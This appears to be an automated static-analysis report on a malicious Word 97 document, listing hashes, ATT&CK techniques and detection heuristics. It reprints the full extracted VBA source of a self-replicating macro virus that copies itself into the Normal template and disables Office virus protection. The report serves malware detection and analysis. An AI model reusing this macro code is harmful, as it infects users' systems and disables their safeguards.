Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 040569009831c2b6…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 2001-09-04 10:17:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-19
MD5: 172b418af8b80b400e76141974eb3c20
SHA-1: feb1abb6a446e7e66d13482bf46b139331aa1763
SHA-256: 040569009831c2b63854fc87e380d70dbdf857a87ad6c29d5eeb0d6f82f53720
Risk Score: 256

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1566.001 Phishing: Spearphishing Attachment

The sample exhibits critical heuristic firings indicating VBA macro-virus replication and AV tampering. The AutoOpen macro attempts to copy itself and another macro ('ac') into the Normal template, and the AutoClose macro also attempts to copy macros and save the document. The script additionally attempts to disable Office virus protection and writes the document to the file path 'c:\doc.win', suggesting dropper or downloader functionality. The ClamAV detection further supports its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-7369994-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7369994-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Application.OrganizerCopy sr, ActiveDocument, Name:="ac", Object:=wdOrganizerObjectProjectItems
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Sub Autoopen()
  • Auto_Close macro [low] OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script:
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2086 bytes
SHA-256: 90df29a0471108a34b80fa5f2a16315260b4818cd98aca372c11c757625f93ca
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ac"
Sub AutoClose()
On Error GoTo ab
Call cf
sr = "c:\doc.win"
imacrocount = WordBasic.countmacros(1, 0, 0)
For i = 1 To imacrocount
zu$ = WordBasic.macroname$(i, 1)
If zu$ = "ao" Then GoTo ab
Next i
Application.OrganizerCopy sr, ActiveDocument, Name:="ac", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy sr, ActiveDocument, Name:="ao", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
ab:
End Sub
Sub ToolsMacro()
MsgBox "Извините, но на пиратской версии эта функция не работает", vbCritical, "Ошибка"
End Sub
Sub ViewVBCode()
MsgBox "Ошибка в системном реестре Windows!", vbCritical, "Error"
End Sub
Sub toolsOptions()
MsgBox "Ваш компьютер теперь обладает удивительным свойством" + Chr$(13) + "-в нём есть ЖИЗНЬ!"
End Sub
'Here it is, my firstborn!
'Its name is 1313. Please remember it!!!

Attribute VB_Name = "ao"
Sub Autoopen()
Attribute Autoopen.VB_Description = "Fuck"
Attribute Autoopen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.one"
On Error GoTo aT
im = WordBasic.countmacros(0, 0)
For i = 1 To im
    If WordBasic.macroname$(i, 0, 0) = "ao" Then
        bI = -1
    End If
Next i
If Not bI Then
    sE$ = WordBasic.FileName$()
    mR$ = sE$ + ":ao"
    WordBasic.MacroCopy mR$, "Normal:ao", 1
    mR$ = sE$ + ":ac"
    WordBasic.MacroCopy mR$, "Normal:ac", 1
End If
Call cf
aT:
With Options
    .VirusProtection = False
    .SaveNormalPrompt = False
End With
End Sub
Sub cf()
On Error GoTo z
MF = Dir("c:\doc.win")
If MF = "doc.win" Then GoTo z
a = ActiveDocument.FullName
ActiveDocument.SaveAs "c:\doc.win"
ActiveDocument.SaveAs a
z:
End Sub